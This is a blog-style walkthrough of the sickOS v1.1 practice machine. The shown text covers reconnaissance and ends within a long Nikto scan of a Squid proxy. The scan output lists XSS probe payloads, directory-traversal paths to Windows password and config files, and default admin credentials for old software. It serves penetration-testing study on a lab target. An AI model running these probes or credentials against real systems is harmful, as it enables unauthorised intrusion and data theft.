sickOS v1.1

Prateek Sarangi
108 min readOct 30, 2021

--

Okay, so before starting this one, according to the author of this machine, this one is very close to the type of machine he got in his OSCP. So it was actually a bit tricky as compared to the others that I had done so far.

With that in mind, let’s start.

arp-scan

The IP Address for the machine is 192.168.162.129

Nmap Scan

Here we go again,

So we find that ports 22, 3128 and 8080 are open. Well from the long (well not that long) history of vulnerabilities, we are safe to assume that may be port 22 won’t be vulnerable. So let’s start with port 3128 and 8080, and if both of them doesn’t work, we can always come back and check out port 22.

Spoiler Alert:- We didn’t have to!!

Nikto Scan

Here actually I did a mistake of getting into a rabbit hole. The nmap scan clearly showed us that the URL request gave in an error, but I kind of neglected it and spend a lot of my following day searching for getting a VPN which might work on the request URL. Damn I was so wrong!!

So let’s start with the nikto scan result, it’s very long by the way…

$ nikto -h http://192.168.162.129:3128

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.162.129
+ Target Hostname: 192.168.162.129
+ Target Port: 3128
+ Start Time: 2021-10-24 02:39:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: squid/3.1.19
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ Uncommon header 'x-cache-lookup' found, with contents: NONE from localhost:3128
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '<li><p>Illegal character in hostname; underscores are not ed.</p></li>' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ /kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
+ /lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ /ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
+ /sshome/: Siteseed pre 1.4.2 has 'major' security problems.
+ /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
+ /scripts/samples/details.idc: See RFP 9901; www.wiretrip.net
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ /cgi-bin/wrap: comes with IRIX 6.2; allows to view directories
+ /forums//admin/config.php: PHP Config file may contain database IDs and passwords.
+ /forums//adm/config.php: PHP Config file may contain database IDs and passwords.
+ /forums//administrator/config.php: PHP Config file may contain database IDs and passwords.
+ /forums/config.php: PHP Config file may contain database IDs and passwords.
+ /guestbook/guestbookdat: PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.
+ /guestbook/pwd: PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.
+ /help/: Help directory should not be accessible
+ OSVDB-2411: /hola/admin/cms/htmltags.php?datei=./sec/data.php: hola-cms-1.2.9-10 may reveal the administrator ID and password.
+ OSVDB-8103: /global.inc: PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php
+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ OSVDB-59618: /inc/dbase.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ OSVDB-2703: /geeklog/users.php: Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.
+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
+ /guestbook/admin.php: Guestbook admin page available without authentication.
+ /getaccess: This may be an indication that the server is running getAccess for SSO
+ /cfdocs/expeval/openfile.cfm: Can use to expose the system/server path.
+ /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
+ /vgn/performance/TMT: Vignette CMS admin/maintenance script available.
+ /vgn/performance/TMT/Report: Vignette CMS admin/maintenance script available.
+ /vgn/performance/TMT/Report/XML: Vignette CMS admin/maintenance script available.
+ /vgn/performance/TMT/reset: Vignette CMS admin/maintenance script available.
+ /vgn/ppstats: Vignette CMS admin/maintenance script available.
+ /vgn/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/record/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/stylepreviewer: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Deleting: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Saving: Vignette CMS admin/maintenance script available.
+ /vgn/vr/Select: Vignette CMS admin/maintenance script available.
+ /scripts/iisadmin/bdir.htr: This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/MS02-028. http://www.cert.org/advisories/CA-2002-09.html.
+ /scripts/iisadmin/ism.dll: Allows you to mount a brute force attack on passwords
+ /scripts/tools/ctss.idc: This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.
+ /bigconf.cgi: BigIP Configuration CGI
+ /blah_badfile.shtml: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
+ OSVDB-4910: /vgn/style: Vignette server may reveal system information through this file.
+ OSVDB-17653: /SiteServer/Admin/commerce/foundation/domain.asp: Displays known domains of which that server is involved.
+ OSVDB-17654: /SiteServer/Admin/commerce/foundation/driver.asp: Displays a list of installed ODBC drivers.
+ OSVDB-17655: /SiteServer/Admin/commerce/foundation/DSN.asp: Displays all DSNs configured for selected ODBC drivers.
+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
+ /SiteServer/Admin/knowledge/dsmgr/default.asp: Used to view current search catalog configurations
+ /basilix/mbox-list.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page
+ /basilix/message-read.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page
+ /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
+ /IlohaMail/blank.html: IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
+ /bb-dnbd/faxsurvey: This may allow arbitrary command execution.
+ /cartcart.cgi: If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.
+ OSVDB-6591: /scripts/Carello/Carello.dll: Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.
+ /scripts/tools/dsnform.exe: Allows creation of ODBC Data Source
+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
+ OSVDB-17656: /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
+ OSVDB-17657: /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
+ /prd.i/pgen/: Has MS Merchant Server 1.0
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /scripts/httpodbc.dll: Possible IIS backdoor found.
+ /scripts/proxy/w3proxy.dll: MSProxy v1.0 installed
+ /SiteServer/admin/: Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm
+ /siteseed/: Siteseed pre 1.4.2 has 'major' security problems.
+ /pccsmysqladm/incs/dbconnect.inc: This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
+ /PDG_Cart/oder.log: Shopping cart software log
+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
+ /view_source.jsp: Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.
+ /w-agora/: w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.
+ OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
+ /pbserver/pbserver.dll: This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-094.asp
+ /administrator/gallery/uploadimage.php: Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.
+ /pafiledb/includes/team/file.php: paFileDB 3.1 and below may allow file upload without authentication.
+ /phpEventCalendar/file_upload.php: phpEventCalendar 1.1 and prior are vulnerable to file upload bug.
+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
+ /scripts/cpshost.dll: Posting acceptor possibly allows you to upload files
+ /upload.asp: An ASP page that allows attackers to upload files to server
+ /uploadn.asp: An ASP page that allows attackers to upload files to server
+ /uploadx.asp: An ASP page that allows attackers to upload files to server
+ /wa.exe: An ASP page that allows attackers to upload files to server
+ /basilix/compose-attach.php3: BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads
+ /server/: Possibly Macromedia JRun or CRX WebDAV upload
+ /vgn/ac/data: Vignette CMS admin/maintenance script available.
+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
+ /vgn/ac/esave: Vignette CMS admin/maintenance script available.
+ /vgn/ac/fsave: Vignette CMS admin/maintenance script available.
+ /vgn/ac/index: Vignette CMS admin/maintenance script available.
+ /vgn/asp/MetaDataUpdate: Vignette CMS admin/maintenance script available.
+ /vgn/asp/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/asp/status: Vignette CMS admin/maintenance script available.
+ /vgn/asp/style: Vignette CMS admin/maintenance script available.
+ /vgn/errors: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/controller: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/errorpage: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/initialize: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/jspstatus: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/jspstatus56: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/metadataupdate: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/previewer: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
+ /vgn/legacy/edit: Vignette CMS admin/maintenance script available.
+ /vgn/login: Vignette server may allow user enumeration based on the login attempts to this file.
+ OSVDB-35707: /forum/admin/wwforum.mdb: Web Wiz Forums password database found.
+ /fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-52975: /guestbook/admin/o12guest.mdb: Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.
+ OSVDB-15971: /midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
+ OSVDB-15971: /MIDICART/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
+ /news/news.mdb: Web Wiz Site News release v3.06 admin password database is available and unencrypted.
+ OSVDB-53413: /shopping300.mdb: VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.
+ OSVDB-53413: /shopping400.mdb: VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.
+ OSVDB-15971: /shoppingdirectory/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
+ OSVDB-4398: /database/db2000.mdb: Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.
+ /admin/config.php: PHP Config file may contain database IDs and passwords.
+ /adm/config.php: PHP Config file may contain database IDs and passwords.
+ /administrator/config.php: PHP Config file may contain database IDs and passwords.
+ /contents.php?new_language=elvish&mode=select: Requesting a file with an invalid language selection from DC Portal may reveal the system path.
+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
+ /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
+ /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
+ OSVDB-53303: /simplebbs/users/users.php: Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.
+ /typo3conf/: This may contain sensitive TYPO3 files.
+ /cms/typo3conf/: This may contain sensitive TYPO3 files.
+ /site/typo3conf/: This may contain sensitive TYPO3 files.
+ /typo/typo3conf/: This may contain sensitive TYPO3 files.
+ /typo3/typo3conf/: This may contain sensitive TYPO3 files.
+ /typo3conf/database.sql: TYPO3 SQL file found.
+ /cms/typo3conf/database.sql: TYPO3 SQL file found.
+ /site/typo3conf/database.sql: TYPO3 SQL file found.
+ /typo/typo3conf/database.sql: TYPO3 SQL file found.
+ /typo3/typo3conf/database.sql: TYPO3 SQL file found.
+ /typo3conf/localconf.php: TYPO3 config file found.
+ /cms/typo3conf/localconf.php: TYPO3 config file found.
+ /site/typo3conf/localconf.php: TYPO3 config file found.
+ /typo/typo3conf/localconf.php: TYPO3 config file found.
+ /typo3/typo3conf/localconf.php: TYPO3 config file found.
+ OSVDB-53386: /vchat/msg.txt: VChat allows user information to be retrieved.
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /webcart-lite/config/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /webcart-lite/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /webcart/carts/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
+ /webcart/config/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /webcart/orders/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
+ /webcart/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /ws_ftp.ini: Can contain saved passwords for FTP sites
+ /WS_FTP.ini: Can contain saved passwords for FTP sites
+ /_mem_bin/auoconfig.asp: Displays the default AUO (LDAP) schema, including host and port.
+ OSVDB-17659: /SiteServer/Admin/knowledge/persmbr/vs.asp: Expose various LDAP service and backend configuration parameters
+ OSVDB-17661: /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp: Expose various LDAP service and backend configuration parameters
+ OSVDB-17662: /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp: Expose various LDAP service and backend configuration parameters
+ OSVDB-17660: /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp: Expose various LDAP service and backend configuration parameters
+ /tvcs/getservers.exe?action=selects1: Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.
+ /whatever.htr: May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/MS02-018)
+ /nsn/fdir.bas:ShowVolume: You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in
+ /forum/admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
+ /jamdb/: JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.
+ OSVDB-1201: /cgi/cgiproc?: It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.
+ OSVDB-6196: /servlet/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
+ /servlet/sunexamples.BBoardServlet: This default servlet lets attackers execute arbitrary commands.
+ OSVDB-6196: /servlets/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
+ /perl/-e%20print%20Hello: The Perl interpreter on the Novell system may allow any command to be executed. See http://www.securityfocus.com/bid/5520. Installing Perl 5.6 might fix this issue.
+ /vgn/legacy/save: Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.
+ /IDSWebApp/IDSjsp/Login.jsp: Tivoli Directory Server Web Administration.
+ OSVDB-6466: /quikstore.cfg: Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt
+ /quikstore.cgi: A shopping cart.
+ /securecontrolpanel/: Web Server Control Panel
+ /siteminder: This may be an indication that the server is running Siteminder for SSO
+ /webmail/: Web based mail package installed.
+ /_cti_pvt/: FrontPage directory found.
+ /smg_Smxcfg30.exe?vcc=3560121183d3: This may be a Trend Micro Officescan 'backdoor'.
+ /nsn/..%5Cutil/attrib.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/chkvol.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/copy.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/del.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/dir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/dsbrowse.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/glist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/lancard.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/md.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/rd.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/ren.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/send.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/set.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/slist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/type.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/userlist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cweb/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cweb/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cwebdemo/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cwebdemo/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /upd/: WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /CVS/Entries: CVS Entries file may contain directory listing information.
+ OSVDB-8450: /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-31150: /LOGIN.PWD: MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.
+ OSVDB-31150: /USER/CONFIG.AP: MIPCD configuration information. MIPCD should not have the web interface enabled.
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /cgi-bin/cgi_process: WASD reveals a lot of system information in this script. It should be removed.
+ /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /examples/servlet/AUX: Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.
+ /Config1.htm: This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/MS02-018 for details.
+ /WebAdmin.dll?View=Logon: Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.
+ /cgi-win/cgitest.exe: This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details. Remove this default CGI.
+ /cgi-shl/win-c-sample.exe: win-c-sample.exe has a buffer overflow
+ /.nsf/../winnt/win.ini: This win.ini file can be downloaded.
+ /................../config.sys: PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.
+ /../../../../winnt/repair/sam._: Sam backup successfully retrieved.
+ /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
+ OSVDB-728: /admentor/adminadmin.asp: Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =
+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /postnuke/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /postnuke/html/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /modules/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /phpBB/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /forum/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2767: /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>: OpenAutoClassifieds 1.0 is vulnerable to a XSS attack
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4015: /jigsaw/: Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and http://www.cert.org/advisories/CA-2000-02.html
+ /cfdocs/expeval/sendmail.cfm: Can be used to send email; go to the page and fill in the form
+ OSVDB-22: /cgi-bin/bigconf.cgi: BigIP Configuration CGI
+ /ammerum/: Ammerum pre 0.6-1 had several security issues.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ /cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C: This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm
+ OSVDB-59412: /db/users.dat: upb PB allows the user database to be retrieved remotely.
+ /Admin_files/order.log: Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.
+ /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ /cfdocs/snippets/fileexists.cfm: Can be used to verify the existance of files (on the same drive info as the web tree/file)
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ OSVDB-59646: /chat/!nicks.txt: WF-Chat 1.0 Beta allows retrieval of user information.
+ OSVDB-59645: /chat/!pwds.txt: WF-Chat 1.0 Beta allows retrieval of user information.
+ OSVDB-53304: /chat/data/usr: SimpleChat! 1.3 allows retrieval of user information.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /config/: Configuration information may be available remotely.
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /examples/jsp/snp/anything.snp: Tomcat servlet gives lots of host information.
